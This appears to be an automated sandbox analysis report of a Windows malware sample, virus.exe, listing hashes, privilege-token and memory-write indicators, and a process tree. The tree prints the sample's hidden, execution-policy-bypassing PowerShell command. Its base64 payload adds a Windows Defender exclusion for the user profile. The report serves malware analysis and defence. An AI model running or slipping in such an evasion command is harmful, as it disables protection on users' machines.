373089475d3ab1a7b96ae64ce982572cfae921d42c63b69d58d4a4506cd4d636

Analysis

max time kernel
5s
max time network
295s
platform
windows10-1703_x64
resource
win10-20231220-en
resource tags

arch:x64arch:x86image:win10-20231220-enlocale:en-usos:windows10-1703-x64system
submitted
04/01/2024, 10:04

Target

virus.exe
Size

818.1MB
MD5

fa42236ffab8984f5daf06da0677da11
SHA1

f6dc4d9f90e2568706b439fa081bc162ac0dec59
SHA256

373089475d3ab1a7b96ae64ce982572cfae921d42c63b69d58d4a4506cd4d636
SHA512

55554acfde7ac823ff441838ca6f31e66f2327c2360f107cf9f9fa287d6bc61ea06586ff863abd5feef0dac3fc444344e0d66a5c739adbd689a100b1ac95e926
SSDEEP

786432:kYVswYVswYVswYVswYVswYVswYVswYVswYVsZ:y

Score

1^/10

Suspicious behavior: EnumeratesProcesses 3 IoCs

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	4788	powershell.exe
Token: SeIncreaseQuotaPrivilege	4788	powershell.exe
Token: SeSecurityPrivilege	4788	powershell.exe
Token: SeTakeOwnershipPrivilege	4788	powershell.exe
Token: SeLoadDriverPrivilege	4788	powershell.exe
Token: SeSystemProfilePrivilege	4788	powershell.exe
Token: SeSystemtimePrivilege	4788	powershell.exe
Token: SeProfSingleProcessPrivilege	4788	powershell.exe
Token: SeIncBasePriorityPrivilege	4788	powershell.exe
Token: SeCreatePagefilePrivilege	4788	powershell.exe
Token: SeBackupPrivilege	4788	powershell.exe
Token: SeRestorePrivilege	4788	powershell.exe
Token: SeShutdownPrivilege	4788	powershell.exe
Token: SeDebugPrivilege	4788	powershell.exe
Token: SeSystemEnvironmentPrivilege	4788	powershell.exe
Token: SeRemoteShutdownPrivilege	4788	powershell.exe
Token: SeUndockPrivilege	4788	powershell.exe
Token: SeManageVolumePrivilege	4788	powershell.exe
Token: 33	4788	powershell.exe
Token: 34	4788	powershell.exe
Token: 35	4788	powershell.exe
Token: 36	4788	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 208 wrote to memory of 216	208	virus.exe	76
PID 208 wrote to memory of 216	208	virus.exe	76
PID 216 wrote to memory of 4788	216	cmd.exe	75
PID 216 wrote to memory of 4788	216	cmd.exe	75

C:\Users\Admin\AppData\Local\Temp\virus.exe
"C:\Users\Admin\AppData\Local\Temp\virus.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAVgBhAHIAaQBhAGIAbABlACgAJwBVAFMARQBSAFAAUgBPAEYASQBMAEUAJwApACAAKwAgACcAJwApAA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:216

memory/4788-4-0x000001E5FCDA0000-0x000001E5FCDC2000-memory.dmp

Filesize
136KB

Download
memory/4788-9-0x000001E5FCDF0000-0x000001E5FCE00000-memory.dmp

Filesize
64KB

Download
memory/4788-12-0x000001E5FCF80000-0x000001E5FCFF6000-memory.dmp

Filesize
472KB

Download
memory/4788-8-0x000001E5FCDF0000-0x000001E5FCE00000-memory.dmp

Filesize
64KB

Download
memory/4788-25-0x000001E5FCDF0000-0x000001E5FCE00000-memory.dmp

Filesize
64KB

Download
memory/4788-7-0x00007FFE0F520000-0x00007FFE0FF0C000-memory.dmp

Filesize
9.9MB

Download
memory/4788-51-0x00007FFE0F520000-0x00007FFE0FF0C000-memory.dmp

Filesize
9.9MB

Download